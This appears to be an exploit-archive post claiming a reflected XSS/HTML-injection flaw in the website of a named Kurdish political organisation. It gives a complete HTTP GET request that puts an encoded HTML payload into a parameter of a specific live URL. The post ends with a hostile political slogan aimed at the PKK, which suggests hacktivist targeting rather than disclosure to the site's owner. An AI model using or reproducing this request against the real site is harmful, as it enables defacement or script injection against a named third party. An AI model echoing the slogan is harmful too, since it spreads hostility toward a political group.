The East Kurdistan Free and Democratic Society Website XSS Injection

2019.11.04

God3err (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# kodar.info XSS Injection #
# The East Kurdistan Free and Democratic Society Website #
# Exploit Founder by God3err #
# Exploit Date : 2-11-2019 #
# Exploit Form : PHP-based #
# Exploit Target : https://www.kodar.info/include/image/output.php

# Exploit Code #
GET https://www.kodar.info/include/image/output.php?image=%3Ch1%3EAlert%3C/h1%3E
Host: www.kodar.info
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

# Respect Us #
# Baby Killer PKK! #

See this note in RAW Version

Vote for this issue:

24%

76%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The East Kurdistan Free and Democratic Society Website XSS Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.